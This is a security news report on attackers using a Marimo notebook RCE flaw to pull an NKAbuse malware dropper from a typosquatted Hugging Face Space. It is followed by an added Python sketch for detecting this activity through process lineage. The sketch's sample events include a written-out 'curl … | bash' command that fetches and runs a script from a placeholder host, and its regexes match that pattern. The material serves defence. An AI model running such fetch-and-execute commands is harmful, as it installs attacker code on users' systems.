Cyber: Ultimate Guide: Hackers exploit Marimo flaw to deploy NKAbuse malware from Hugging Face
Hackers are exploiting a critical vulnerability in the Marimo reactive Python notebook to deploy a new variant of the NKAbuse malware hosted on Hugging Face Spaces.

Attacks leveraging the remote code execution flaw (CVE-2026-39987) started last week for credential theft, less than 10 hours after technical details were disclosed publicly, according to data from cloud-security company Sysdig.

Sysdig researchers, who continued to monitor activity related to the security issue, identified additional attacks, including a campaign that started on April 12 and abuses Hugging Face Spaces, a platform for showcasing AI applications.

Hugging Face is an AI development and machine learning-focused platform that acts as a hub for AI assets such as models, datasets, code, and tools shared among the community. Hugging Face Spaces lets users deploy and share interactive web apps directly from a Git repository, typically for demos, tools, or experiments around AI.

In the attacks that Sysdig observed, the attacker created a Space named vsccode-modetx (an intentional typosquat for VS Code) that hosts a dropper script (install-linux.sh) and a malware binary named kagent, which is also an attempt to mimic a legitimate Kubernetes AI agent tool.

After exploiting the Marimo RCE, the threat actor ran a curl command to download the script from Hugging Face and execute it. Because Hugging Face Spaces is a legitimate HTTPS endpoint with a clean reputation, it is less likely to trigger alerts.

The dropper script downloads the kagent binary, installs it locally, and sets up persistence via systemd, cron, or macOS LaunchAgent.
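
Because the download host has a clean reputation, the process lineage is the more useful signal: a notebook server should not be spawning curl against Hugging Face. The following detection sketch is an added example, not code from Sysdig or BleepingComputer; the event schema, the `EXAMPLE-SPACE` hostname and the `/PLACEHOLDER/` path are assumptions constructed for illustration.

```python
import json
import re

# Constructed process-exec events (assumed schema: pid, ppid, comm, cmdline).
# Hostname and path are placeholders, not values from the report.
SAMPLE_EVENTS = """\
{"pid": 100, "ppid": 1, "comm": "marimo", "cmdline": "marimo edit notebook.py"}
{"pid": 210, "ppid": 100, "comm": "sh", "cmdline": "sh -c curl -fsSL https://EXAMPLE-SPACE.hf.space/install-linux.sh | bash"}
{"pid": 211, "ppid": 210, "comm": "curl", "cmdline": "curl -fsSL https://EXAMPLE-SPACE.hf.space/install-linux.sh"}
{"pid": 212, "ppid": 210, "comm": "bash", "cmdline": "bash"}
{"pid": 213, "ppid": 212, "comm": "kagent", "cmdline": "/PLACEHOLDER/kagent"}
{"pid": 300, "ppid": 1, "comm": "curl", "cmdline": "curl -O https://huggingface.co/some-org/some-model/resolve/main/config.json"}
{"pid": 400, "ppid": 100, "comm": "python3", "cmdline": "python3 -c print(1)"}
"""

# curl/wget fetching from a Hugging Face host, and output piped into a shell.
HF_FETCH = re.compile(r"\b(curl|wget)\b.*https?://[\w.-]*(huggingface\.co|hf\.space)\b", re.I)
PIPE_TO_SHELL = re.compile(r"\|\s*(ba|z|da)?sh\b")

def load_events(lines):
    """Index JSON-lines events by pid."""
    return {e["pid"]: e for e in map(json.loads, lines.strip().splitlines())}

def has_marimo_ancestor(pid, procs):
    """Walk the ppid chain; True if any ancestor is a Marimo process."""
    seen, ppid = set(), procs[pid]["ppid"]
    while ppid in procs and ppid not in seen:  # 'seen' guards against pid loops
        seen.add(ppid)
        if "marimo" in procs[ppid]["cmdline"]:
            return True
        ppid = procs[ppid]["ppid"]
    return False

def detect(lines):
    """Return (pid, severity, reason) for suspicious descendants of Marimo."""
    procs = load_events(lines)
    alerts = []
    for pid, p in sorted(procs.items()):
        if not has_marimo_ancestor(pid, procs):
            continue  # the same fetch outside the notebook tree is not flagged
        if HF_FETCH.search(p["cmdline"]):
            sev = "high" if PIPE_TO_SHELL.search(p["cmdline"]) else "medium"
            alerts.append((pid, sev, "notebook child fetched from Hugging Face"))
        elif p["comm"] == "kagent":
            alerts.append((pid, "high", "kagent started under notebook process"))
    return alerts

if __name__ == "__main__":
    print(*detect(SAMPLE_EVENTS), sep="\n")
```

The lineage check only covers the initial execution; once the dropper's systemd, cron or LaunchAgent persistence takes over, the binary no longer runs under the notebook process and needs a separate check.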
Source: BleepingComputer